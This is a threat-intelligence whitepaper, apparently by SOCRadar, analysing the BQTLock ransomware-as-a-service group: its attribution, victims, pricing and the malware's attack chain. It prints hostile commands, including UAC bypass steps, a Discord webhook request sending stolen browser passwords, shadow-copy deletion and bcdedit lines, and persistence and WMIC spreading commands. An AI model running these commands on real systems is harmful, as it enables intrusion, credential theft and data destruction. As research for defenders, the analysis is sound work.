BQTLock Ransomware Whitepaper wih Country of Origin: Lebanon (?) BQTLock is a new Ransomware-as-a-Service (RaaS) that has quickly disrupted the scene.Starting in the East and now operating globally, it shows unique behavior, including data theft in every version. BQTLock targets victims in waves, demands Monero (XMR), and has possible Links to hacktivist groups. BQTLock Ransomware SOCRadar’ socradar.io Your Eyes Beyond ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper BQTLock Ransomware BQTLock is an advanced ransomware-as-a-service (RaaS) that has emerged in recent months and is entering the scene in a disruptive way. Its operations, attack methods, and malware features stand out from other ransomware groups. Originating from the East and expanding to global operations, BQTLock combines rapid technical growth with aggressive extortion models. Each malware version includes not only encryption but also data theft, showing continuous sophistication. Victims face both operational disruption and the threat of sensitive data leaks. Threat actor card of BQTLock Ransomware The group uses a wave-based business model and demands payments mainly in Monero (XMR). It also mixes economic goals with propaganda, making it both a financial and ideological threat. This hybrid style is rare in the ransomware landscape and makes BQTLock a case of special interest for researchers and defenders. 2 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Who is BQTLock Ransomware? This threat group developed the ransomware that gives its name to the operation. Its main representative is Karim Fayad (known online as ZeroDayX or ZeroDayX1), supported by Fuch0u, who frequently appears on the adversary’s public pages. The group appears to maintain close relationships with pro-Palestinian hacktivist groups such as Liwaa Mohammed, with mutual activity on social networks. SOCRadar Cyber Threat Intelligence, Ransomware Intelligence Publicly, BQTLock emphasizes political messaging and ideological motives; however, the primary internal driver is financial gain, contrasting with true hacktivist operations. This dual model, part hacktivist, part criminal, introduces a novel twist to traditional RaaS models, raising questions about the potential misuse of political narratives to instill fear while pursuing financial objectives. X (Twitter) profiles of Anonymous Lebanon and LulzSec 3 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper The core team appears to include ZeroDayX and Fuch0u, who have historically been linked to accounts such as Anonymous Lebanon, and have had interactions with LulzSec-related accounts and Anonymous affiliated activities. SOCRadar’s Threat Hunting, message in liwaamohammad Telegram channel: “Hello i am ZeroDayX the real owner of Liwaa mohammad and BQTLock ransomware” In addition, both BQTLock and ZeroDayX itself have had direct interactions with the pro-Palestinian hacktivist group Liwaa Mohammed, who proclaims himself as the leader of this organization, and has consistently posted BQTLock update messages through Telegram channels managed by the hacktivist group. Telegram post by ZeroDayX linking Liwaa Mohammad and BQTLock Ransomware, with attack claims and RaaS promotion 4 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ZeroDayX was doxed by the R00TK1T ISC Cyber Team, which directly linked him to LulzSec. His real name was revealed as Karim Fayad, with personal information exposed that connected the current leader of BQTLock directly to these hacktivist groups. SOCRadar’s Threat Hunting, doxing of ZeroDayX by R00TK1T on their Telegram channel The proximity and potential authorship of the same user or relationship with different hacktivist groups, as well as that of BQTLock, is evident across all the social networks mentioned, creating a solid core of organization and communication. Photos of suspected admin of BQTLOck, shared on Telegram 5 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Analysis shows BQTLock’s leadership (Karim Fayad aka ZeroDayX and Fuch0u), ties to Liwaa Mohammed, possible past links to LulzSec and Anonymous Lebanon, and victim listings with ransom demands totaling over 700 XMR (~190k USD). Link analysis of the BQTLock Ransomware The BQTLock team has consistently communicated via Telegram channels, which have been used for propaganda, information about updates, and to liaise with RaaS affiliates. Victims were also left a note with an email address for more direct and professional communication. 6 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Victimology Since BQTLock burst onto the scene, it has appeared in various orchestrated campaigns or attacks that have severely impacted victims. The threat actor has shown adaptability and evolution both in its techniques and in the malware used. These campaigns have been amplified through the Telegram groups at its disposal, which serve as the main thread of its messaging. Some of the attacks carried out have been claimed in these groups by the operators and creators of the ransomware in order to put additional pressure on the victims by making them public. Confirmed Victims ●​ USA Military Alumni Networks – full computer and database backups compromised, with an unpaid demand of 500 XMR. Victim posting on their data leak site (DLS) ●​ eFunda, Inc. – over 270 subdomains affected, with full backups encrypted and an unpaid demand of 600 XMR. 7 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Victim posting on their DLS #2 ●​ European Business Server Cluster – servers in Europe targeted, with 1500 XMR requested. Victim posting on their DLS & Telegram #3 The adversary boasts on their various social media platforms about attacks on the domains of the mentioned targets, which belong to sectors such as education or public-military matters, fitting into the usual modus operandi of RaaS operations that started before BQTlock, following the aforementioned argumentative line, where targets are generally from the US, with components that the adversary can use for their pro-Palestine narrative. 8 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Allegedly compromised organizations by BQTLock shared on Telegram In addition to the companies already confirmed on their website, the adversary has continued targeting web pages and, consequently, businesses, where the ransom demand remains unknown. Defaced websites as follows: mindmoney[.]fun skilltoart[.]com kasmirPort[.]com 9 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper However, the impact has been made visible by defacing their portals to showcase the attack, something that has been echoed both on Telegram groups and Twitter accounts managed or controlled by ZeroDayX. One of the defaced websites by BQTLock Target Industries Beyond the confirmed victims, both BQTLock and potential affiliates who may have used the RaaS in their operational model, being a completely new ransomware group with pro-Palestinian propaganda styles, certain trends followed by the actor are expected or have been observed, based on their history and that of other RaaS operations before them, whose trajectories are often parallel in many cases, with similar beginnings, but taking into account the particularities of the actor. 10 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Potential BQTLock victims may belong to different archetypes: ●​ Healthcare: Generally having low or very low defensive capabilities and high operational criticality, directly putting human lives at risk and that could add propaganda impact in strategic countries. ●​ Educational: Following some cases already seen, considering the extensive relationship with potential companies and the intellectual property that resides there, being entities with limited cybersecurity capabilities. ●​ SMEs or SMBs: Typically with low cybersecurity spending and serving as suppliers to different companies of greater importance and economic weight, forcing them to pay if they don't want the breach to become public and potentially obtaining information about other companies for future attacks. ●​ Public sector: Public entities such as municipalities or similar organizations are often testing grounds for criminal groups due to their weak cybersecurity defenses and limited technical capabilities, having dual use in terms of potential hacktivist pressures against countries that oppose their ideals. ●​ Critical infrastructure: Although of greater technical complexity, this is a sector that often has public or political ties, which could be a focus for exploitation by BQTlock, having on their side the great importance and criticality that these types of companies have in areas such as utilities, energy, or logistics. ●​ Financial Sector: Banks and fintech, combining real economic damage with symbolic damage against “Western capitalism”. 11 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Target Countries Confirmed attacks have affected organizations in the United States, Europe, and other regions. Propaganda messaging also shows hostility toward Israel, the UAE, the European Union, and the United States, aligning with the group’s hacktivist narrative. The hacktivist tendencies that BQTLock is following may be decisive in selecting future victims, both for the original core that created the RaaS and for potential affiliates who share the same beliefs. This makes it strategically important to understand which countries could be targeted, considering BQTlock’s anti-Western vision and narrative. Existing & potential target countries: ●​ United States and Israel: Main targets aligned with the group’s hacktivist rhetoric, framing these attacks as “resistance” against Western and Middle Eastern policies. ●​ European countries: Especially those with pro-Israel policies or a strong presence of multinational corporations, using the narrative of “economic liberation.” ●​ Western aligned nations: Including Australia, Canada, and others perceived as part of the Western “establishment” or Middle Eastern countries with relations with the rest, such as Saudi Arabia, India, or the UAE. 12 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper A poll for “”Which country should be targeted” on their Telegram channel/s This hybrid strategy allows BQTLock to justify attacks as “acts of resistance” while sustaining a profitable business model, creating a dangerous precedent where economic motivations are concealed under seemingly legitimate political causes. 13 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Modus Operandi Once again, BQTLock operates under a Ransomware-as-a-Service (RaaS) model. The core group develops and maintains the ransomware, while affiliates conduct the actual intrusions and spread the malware. In return, affiliates share ransom payments with the operators. Decryption Waves & Estimated Gains A distinguishing element of BQTLock is undoubtedly the use of decryption waves, where different tiers have been established for the release of affected files. They release free keys under names like 1337 or LULZ, and depending on the decryption method, each operation applies a different wave, showing great depth and a system distinct from what we were accustomed to in other RaaS operations Tiers of decryption waves At first glance, BQTLock shows clear hacktivist influences, using terms like 1337, LULZ, or 313 to label waves. These serve as pricing tiers, from cheapest to most expensive: ●​ 1337 (leet): Symbol of hacker elitism, but in practice the “basic” model, starting at 13 XMR.​ 14 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ●​ LULZ: Linked to fun or notoriety, their “intermediate” version, starting at 26 XMR.​ ●​ 313: Oriented toward political/geopolitical targets, the “premium” model, starting at 40 XMR. Although styled with hacktivist jargon, the purpose is economic. Like LockBit, ALPHV, or Conti, they use tiered pricing to adapt ransom demands to each victim. So far, BQTLock has claimed at least three companies, with estimated demands above 700 XMR. Earnings could exceed 1,000 XMR (~$300,000 USD), while some Twitter posts by ZeroDayX suggest ransoms above $2 million USD, pointing to a wider range. All of this within less than 3 months of activity. If sustained, BQTLock could double earnings quickly, following the path of bigger groups. Pricing & Affiliates BQTLock not only targets companies directly but also runs a full affiliate system. Through XMR payments, external actors can buy access in starter, professional, or enterprise tiers. Affiliates get full use of the tool, with options to customize ransom notes, wallpapers, decryptors, and other features. The program also includes support, communication, and platform access. ●​ Starter (9 XMR, 2 weeks) ●​ Professional (15 XMR, 1 month) ●​ Enterprise (30 XMR, 3 months) The system also implements psychological pressure tactics on victims, where ransom fees double after 48 hours and decryption keys are destroyed after 7 days without response. Pricing system for the RaaS program 15 https://socradar.io/lockbit-5-0-ransomware-cartel-what-you-need-to-know/ ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Technical Details In the technical section, BQTLock has demonstrated capability and development in each of its attacks, where it has been able to deploy the ransomware that gives it its name, creating expectation among analysts and fear in companies that could potentially be affected by this phenomenon. Binary Information Once the attacker has gained access, they can develop their activities by trying to obtain information from the compromised device, also discovering information about adjacent disks or networks in order to move tools or the ransomware itself to other devices and detonate it. The adversary has recently worked with a ZIP file, which contains various libraries that support some of the functionalities of the main executable, in addition to other eventual executables that also assist in certain tasks, such as the partial decryptor, since on occasions the adversary has offered to provide decryptor samples so that the user and/or affiliate can see the potential and verify that they have the necessary tools. Contents of the mentioned ZIP file 16 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper DLLs Regarding the libraries, they are usually legitimate files, as they do not pose risks or are not libraries developed by the adversary, but they support certain very important tasks for ransomware development. Some of the most important ones include: ●​ Encryption/cryptography functions: OpenSSL for AES-256/RSA-4096 (OpenSSL 3.x) ●​ Communications: HTTP/HTTPS, QUIC, SSH, and FTP protocols, commonly used for Discord and Telegram ●​ Multi-algorithm compression: Using different methods (Brotli, Zstandard, and Zlib) ●​ Technical support: Multi-threading, compilation, and asynchronous communications ●​ Evasion and/or operational resilience: Domain validation and potential use of different protocols This method of including a large number of libraries is typically done to make the malware resilient and self-sufficient, since BQTlock's capabilities are quite complex and they want to be able to execute the ransomware on any device. Therefore, they don't want to rely on the possibility that some of the libraries they use might not be present on the affected system. This can commonly occur when providing an example of how it works to potential buyers and/or affiliates with a simplified example of the decryptor, or because they are in a testing phase. This file deployment is not common in advanced ransomware, but it's another indication that BQTLock is both in development and seeking new affiliates. 17 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Decryptor Regarding the executables, we can find the decryptor example, whose function is to locate different drives, traverse folders searching for encrypted files, and pass them through the decrypt function to try to recover them. However, this is only an example and obviously the complete version has not been shared, as they reserve this for their personal use or for affiliates who purchase the Professional or Enterprise versions, as we have seen previously. BQTLock decryptor in action, console output scanning directories and reporting errors The adversary is actively working and publicly showing on social media clear examples where a new version of this decryptor executes successfully in a different environment, passing the extension name of the files to search for and the key to execute the operation. Alleged decryptor in action (Shared by the threat actor itself on X) 18 https://x.com/zerodayx1/status/1950908574072217732 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper The threat actor is showcasing the decryptor in social media platforms (Left to right, SOCRadar-Threat Hunting, Telegram and X) Ransomware & Versions Regarding the main binary, which contains the ransomware, it has undergone changes and improvements over the months. Despite BQTLock having a short lifespan, the developers have shown great work and agility in updating and improving the malware, adding new functionalities or perfecting the techniques they used by presenting them as different versions of BQTlock. ●​ Before July – V1: Auto-deletes backups, fast encryption, pre-exfiltration, visual customization, persistence (process hollowing, scheduled tasks, etc.). ●​ July – V2 & V3: Undocumented, but likely included code refinement, RaaS builder improvements, evasion upgrades, and added customization. 19 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ●​ July & August – V4: Introduced advanced anti-analysis, system recognition, Discord C2, privilege escalation (SeDebug, hollowing), and UAC bypass. ●​ August & September – V4+: Added browser credential theft (Chrome, Firefox, Edge, Opera, Brave), expanded exfiltration, a new Linux version with builder, and an OSINT tool (BAQIYAT.osint). Version timeline of BQTLock ransomware strains After analyzing various samples, BQTLock presents itself as ransomware that contains a large number of interesting characteristics that we will review in order to understand how they work, with the objective of breaking down all relevant functionalities and having an orderly understanding of the work done by the developers, taking into account that the binary usually uses multi-threading in the latest versions, allowing it to perform operations simultaneously. 20 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Attack Chain The malware’s behavior may vary depending on the version, but the execution chain tends to remain consistent in terms of the tasks it performs. Depending on the builder, additional capabilities may be included. Visualization of the BQTLock’s attack chain 21 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Initial Access The attack method for a RaaS typically varies in each incursion, as each victim presents different weaknesses at the technological level (exposed RDP, vulnerabilities...) or at the human level (phishing, insiders...). The initial access obtained by BQTLock in its incursions is still unknown; however, based on the history of other RaaS operations, we can speculate about the most common access methods for this type of adversary: ●​ Service Exploitation: Compromised or weak credentials on exposed services (usually RDP), which can be obtained by those who use RaaS through brute force, password spraying, etc., or likely facilitated by Initial Access Brokers. ●​ Phishing Campaigns: Email-based delivery of the malicious ZIP archive containing the initial BQTLock binary named Update.exe. ●​ Software Vulnerabilities: Exploitation of unpatched systems to deliver the payload; since the adversary has affected various domains, they could have exploited vulnerabilities in these systems to gain access. ●​ Supply Chain Attacks: Given their targeting of educational and military networks, this allows them to pivot to other companies with information obtained from one of them. 22 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Execution Initially, BQTLock still has sections related to the development of the ransomware itself, where we can see that it regularly logs, in all samples, most of the steps it is following. For this purpose, it writes a txt file in a temporary path (\Windows\Temp\bqt_log.txt) that is accessible to any user, thus avoiding some locations like System32 or ProgramFiles. Decompiled and disassembled codes showing BQTLock creating and writing logs to C:\Windows\Temp\bqt_log.txt Txt file and its content 23 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Once the log is secured, it performs other reconnaissance and verification tasks, such as obtaining information about the operating system where the ransomware is running. After extracting the information, it logs it, a practice it will perform throughout most other sections. Code showing BQTLock retrieving OS version, with the log file confirming detection of Windows 6.1 Build In initial phases, it is common for it to check the Mutex to know if the binary is already running, using a GUID format (Global\{00A0B0C0-D0E0-F00-1000-200030}) to avoid being seen, making it more complicated to detect and allowing it to change depending on the builder version, so it won't be static like other malware 24 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Disassembled code in IDA Pro showing BQTLock creating a mutex with a GUID format to avoid multiple executions and hinder detection A fundamental aspect of the malware is checking for analysis techniques or malware analysis platforms, where it is common in these phases to verify if the executable is running on virtual machines or checking if there is any debugger running. This phase can be performed in various ways, but in most samples it performs different checks using isDebuggerPresent or checking if there is any remote debugger, a technique also used by analysts to bypass these checks (CheckRemoteDebuggerPresent). Decompiled view showing BQTLock using IsDebuggerPresent to detect debugging environments 25 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Anti-debug checks with IsDebuggerPresent and CheckRemoteDebuggerPresent, logging “Performing anti-debug checks In this section, we can also see different checks trying to locate where the victim is situated, attempting to make external requests and collecting the public IP of the network it is on. For this, it can use different platforms that return this information, which it saves during execution. BQTLock retrieving and logging the victim’s public IP address during execution 26 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper BQTLock using the legitimate service icanhazip[.]com to obtain the victim’s public IP address Reconnaissance After finishing the initial phase, where it collects key information, it moves to a more technical section, where it will obtain more relevant data. It will begin by extracting device information such as the computer name, which it will use later. BQTLock retrieving the computer name and username from the infected system In some versions, it also obtains information about the BIOS or motherboard using WMI, and depending on versions, using the same system to obtain Win32_ComputerSystem and Win32_OperatingSystem. In this case, it performs queries to obtain Win32_BIOS and Win32_BaseBoard to get the BIOS and motherboard serial numbers respectively. Like the previous information, it will use this later to generate unique identifiers, a very common practice in ransomware, as well as to send it externally and know the characteristics of each affected device. 27 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper BQTLock querying BIOS and BaseBoard serial numbers via WMI to fingerprint the victim system​ In this phase, it also performs reconnaissance of what is connected to the device, where it can find disks or shared folders. This information will also be key to knowing what needs to be traversed and, therefore, encrypted later. In the analyzed samples, it has been common to collect the size of each one and how much free space remains on the traversed disks. BQTLock checking available disk space and collecting drive information from the victim system 28 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ​ PI call trace revealing BQTLock interacting with drives (C:\ and D:) using CreateFile, QueryFullSizeInformation, and CloseFile Privilege Escalation In a more advanced section, the ransomware performs less common practices such as user creation, being a practice that operators or RaaS affiliates usually perform before executing samples to have greater control over the infrastructure and/or be able to execute tools or malware with elevated privileges. In addition to this, the ransomware will obviously check who is executing the sample to know if they have sufficient permissions. In newer versions, the adversaries have introduced UAC bypass functionality, which will allow the sample to execute legitimate binaries that perform implicit elevation when executed (Auto-elevated). This means they will be able to execute LOLbins that when executed, will run as administrator/System, bypassing the usual window that asks if we want to execute the binary as administrator, effectively bypassing UAC. In this case, it performs one bypass task or another depending on the operating system, where depending on this case it can perform one of the following bypasses: 29 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Windows 11: Copies the malware payload to the temporary path (bqt_btpass.inf) and executes cmstp.exe /au \\bqt_btpass.inf if Windows 11 30 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ●​ Windows 10: Modifies the registry key HKCU\Software\Classes\ms-settings\Shell\Open\command, inserting the payload in it and executes fodhelper.exe, which will search the registry key and execute the binary else if Windows 10 31 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ●​ Windows 7,8: Modifies the registry key HKCU\Software\Classes\mscfile\shell\open\command, inserting the payload in it and executes eventvwr.exe, which will search the registry key and execute the binary else if Windows 7/8 32 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper In this case, already having adequate privileges, so the execution of this step was not necessary for it: The malware is already running with administrator privileges After this function, the malware tries to check tokens to adjust privileges if necessary, as a verification, in addition to increasing them, to ensure the next step. In this, it performs a usual combination of: OpenProcessToken + Token_Adjust_Privileges (0x28) + LookUpPrivilegeValueA + SeDebugPrivilege With the bypass and this step, it achieves much higher privileges, which will serve it in the following phases, such as the creation of an administrator user, which it creates using different patterns, where sometimes it will use BQTLockAdmin or Guest_"ID". The ID is generated at runtime, so it will be different in each sample. As we can see, the generated passwords are simple and contain just enough to meet minimum password security standards (+8 characters, at least 1 special character and combination of lowercase and uppercase letters with some number). 33 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Creation of an administrator user 34 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper BQTLock successfully creating a new admin user account (Guest_3437) with elevated privileges Command and Control (C2) At this point, the malware has sensitive device information, has managed to execute the sample as administrator bypassing UAC, as well as escalate privileges, so after this, it will try to maintain contact with the C&C and obtain more relevant information from the affected device. First, it tries to establish connection with the C2, which it usually communicates with through two IPs (92[.]113[.]146[.]56 and 208[.]99[.]44[.]55) depending on the sample. C2 IP #1 35 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper C2 IP #2 Login screen on C2 IP 36 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Here it will perform the bootstrap phase where with the collected device information it will make a request against the attacker-controlled equipment with the necessary information. Here the adversary will receive elements such as: ●​ OS version of the affected device ●​ Hostname ●​ User ●​ HW serials (BIOS, Motherboard) ●​ Public IP ●​ Administrator user and password created previously ●​ API key (BQTLOCK_...) BQTLock preparing an api_key parameter used for authenticating infected devices with its C2 server #1 BQTLock preparing an api_key parameter used for authenticating infected devices with its C2 server #2 It will pass everything through RSA encryption, where the attacker will respond with confirmation of the affected device registration with a BOT-ID, which will allow the operator to know which machine and campaign each device is related to, making affiliate management much easier. Additionally, this identifier will also be used in the README file, so that the victim can have communication with the attacker in an orderly manner based on this type of indicators. 37 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper C2 response confirming successful registration of the infected device with bot ID #1 C2 response confirming successful registration of the infected device with bot ID #2 In the same way, in addition to registering with the BQTLock panel, the malware can also use Telegram to send the same information to a bot extracted during execution. It builds the request with the same fields observed previously. Although this might seem redundant, it allows operators and affiliates to manage infections or receive alerts directly on mobile devices, providing greater accessibility through these bots. It also serves as a safeguard in case the panel is taken down, while offering an alternative method for controlling data exfiltration, as will be shown later. BQTLock sample using the Telegram API to send stolen data via bot commands After this checkpoint, the attacker continues obtaining device information, so it takes screenshots of the affected device's screen, discovering everything on the victim's monitor, saving the captures, usually in the same temporary path it has used previously. 38 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper BQTLock capturing a screenshot of the victim’s desktop and saving it as bqt_screenshot in the Windows Temp directory BQTLock writing the captured screenshot file into the Windows Temp directory The saved screenshot (bqt_screenshot_41611140.png) 39 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper During this phase, the developers have introduced browser data theft capabilities, an uncommon feature in this type of malware. Here we can observe how it has an internal list of browsers, which it will traverse searching for them on the affected device, to locate each browser's profiles and extract credentials, making requests to paths like User Data or Login Data. BQTLock retrieving browser paths (Chrome, Google, User Data, Default, Edge) to access stored credentials and profile information 40 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper BQTLock targeting multiple web browsers to steal stored credentials and profiles BQTLock accessing user profile and browser data directories under AppData and Roaming File system activity showing BQTLock creating and reading files across multiple web browsers’ user data folders 41 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper The browsers generally searched by BQTlock, as well as the paths, in all of them by accessing UserData and Profiles in the following: ●​ Chrome​ ●​ Edge​ ●​ Brave​ ●​ Opera​ ●​ Vivaldi​ ●​ Yandex​ ●​ Firefox Once it extracts all information from these browsers, it saves the credentials in a new file that it created previously in the same temporary path, to subsequently send it. 42 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper BQTLock storing stolen credentials in bqt_passwords.txt within the Windows Temp directory BQTLock storing stolen credentials in bqt_passwords.txt within the Windows Temp directory #2 Passwords text file in Windows files In addition to communication with the C&C, BQTLock maintains communications with Discord, where it sends these types of extracted files. In this function, it constructs the HTTP request using multipart/form-data, where the password file will be attached so they can access it easily via Discord, in addition to encrypting traffic without needing to perform any additional action. 43 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper POST https://discord.com/api/webhooks// Content-Type: multipart/form-data; boundary=---------------------------2327476541 Content-Length: -----------------------------2327476541 Content-Disposition: form-data; name="payload_json" Content-Type: application/json { "content": "File attached: bqt_passwords.txt" } -----------------------------2327476541 Content-Disposition: form-data; name="passwords_file"; filename="bqt_passwords.txt" Content-Type: text/plain --- Collected Browser Passwords --- -----------------------------2327476541-- BQTLock using HttpOpenRequestA to send stolen data via Discord webhooks 44 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Thanks to the use of Discord, they don't need to have infrastructure, plus they have very high accessibility for operators and affiliates, being able to change the webhook if it were blocked, so it's a simple cloud structure to use that is useful for this type of activities. Impact After the previous reconnaissance, the adversary has already gathered critical intelligence about both the target device and any data stored in browsers. BQTLock is now ready to execute its final phase, performing the most impactful operations including file encryption, lateral movement attempts, and persistence establishment. Initially, the samples prepare a wallpaper that will subsequently be set as the desktop background. To accomplish this, the malware decodes static code during runtime, transforming it into a BMP format that is then saved in the same temporary directory where previous operations were conducted. The wallpaper is then applied using Windows API calls. SPI_SETDESKWALLPAPER flag ​ Decode + write folder & path + SystemParametersInfoA + SPI_SETDESKWALLPAPER (0x14) Wallpaper path 45 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper C:\Windows\Temp\bqt_wallpaper.bmp During this phase, shadow copy deletion is standard practice, alongside modifications to bcdedit. This functionality has evolved across versions, employing different execution methods to achieve the following objectives: ●​ Shadow Copy Elimination: Abuse of vssadmin to delete shadow copies, preventing Windows recovery​ ●​ WMIC Shadow Copy Deletion: Using wmic for the same purpose while redirecting output to avoid leaving traces​ ●​ Boot Recovery Disabling: Deactivating Windows automatic startup repair via bcdedit​ ●​ WinRE Disabling: Disabling Windows Recovery Environment through bcdedit abuse 46 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper vssadmin.exe delete shadows /all /quiet wmic.exe shadowcopy delete > NUL 2>&1 bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures > NUL 2>&1 bcdedit.exe /set {default} recoveryenabled no > NUL 2>&1 Deletion of shadow copies Following system modifications, the malware verifies running processes, a technique designed to eliminate processes that could either halt encryption or alert users to BQTLock's presence, such as database application failures. The malware employs the standard approach of capturing running processes and comparing them against an internal blacklist, terminating any matches found. ​ CreateToolHelp32Snapshot + Process32First (OpenProcess+TerminateProcess) + Process32Next During analysis, if a monitored process is detected, it can be modified to bypass the check and avoid termination. 47 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper BQTLock detecting procmon.exe This step precedes process hollowing execution. The ability to execute within another process's memory space, appearing more legitimate than the original, is crucial for evading defenses and maintaining stealth. At this point, leveraging previously escalated privileges for access to critical processes, the malware calls explorer.exe, reserving predefined memory space and writing code while the process remains in suspended state. 48 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper CreateProcess (Explorer.exe in Suspended mode) + GetThreatContext + VirtualAlloc + WriteProcessMemory + SetThreadContext + ResumeThread Process injection flow During injection, the binary to be injected is extracted for verification purposes, comparing the original with the memory version to identify potential new functions. However, it remains identical to the executing binary, completing injection into explorer.exe and achieving a legitimate binary containing BQTLock code. 49 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Process hollowing successful System restart represents a critical point, if the system were powered down during this phase, the adversary would lose partial progress. Therefore, persistence is crucial for ensuring binary re-execution. BQTLock creates scheduled tasks with various names that execute at each system startup, reiterating execution when necessary. Usual Commandline: schtasks /create /tn "" /tr "" /sc ONLOGON /rl HIGHEST /f Task names used​ Microsoft\Windows\Maintenance\SystemHealthCheck BQTLock_Startup_ BQTLock creating a scheduled task 50 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Properties of the scheduled task Subsequently, the malware attempts network expansion, a capability not integrated into all ransomware variants. BQTLock possesses the ability to propagate samples or reach adjacent networks and devices. During this phase, it attempts file copying and execution via WMIC, and also has potential for remote service creation via sc.exe, though this functionality isn't commonly observed in general execution. wmic /node:\\ process call create "" 51 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Process call creation Payload copy and process creation Once file movement and injection are completed, depending on the version, the malware may execute original binary deletion. Since it commonly creates copies in temporary directories, this improves evasion. With persistence already established in the system, a 52 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper scheduled path will be called at each iteration. This execution commonly occurs using `cmd.exe` or through batch files in older versions. cmd.exe /C timeout /t 3 /nobreak > NUL & del /f /q "" & exit BQTLock executing a self-deletion routine to remove its binary after execution 53 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper In the most critical phase where encryption begins, multi-threading becomes most apparent, as the sample systematically traverses each disk to locate target files for encryption. Code snippet showing BQTLock scanning and identifying available logical drives for encryption During this operation, the sample accesses functions that prepare the ransom note, typically stored as Base64-encoded strings that are processed during execution. The filename is variable since the builder allows modification of both the filename and the extension used for renaming encrypted files, which is also prepared during this phase. Disk traversing 54 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper README_pay_DECRYPT.txt README_pay2_DECRYPT.txt README_DECRYPT.txt Txt file creation Decoded ransom note 55 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper Encryption is performed using a hybrid AES-256 + RSA-4096 scheme while iterating through selected files with separate threads. Each file receives AES encryption, and each key is encrypted with RSA (using OpenSSL) public key cryptography that can only be decrypted with the private key held by affiliates or operators who launched the attack. During the process, depending on the sample, files may be renamed to .temp, then encrypted and changed to “.bqtlock”. Encryption process​ ​ 56 ​ ​ ​ ​ ​ ​ ​ ​ ​ BQTLock Ransomware Whitepaper ​ BQTLock initializing encryption File extensions change to .bqtlock Builder The Builder, as previously mentioned, represents a key component in BQTLock as it enables affiliates and operators to effectively customize the ransomware they wish to deploy on victim devices, providing considerable flexibility and decision-making autonomy to adversaries utilizing this tool BQTLock features two distinct Builders: one for Windows and another for Linux. The Windows Builder offers extensive customization options, allowing modification of most relevant ransomware parameters. The Windows Builder enables modification of: ●​ Ransom Note: Custom message content and formatting ●​ Encrypted Extension: File extension applied to encrypted files ●​ Maximum File Size: 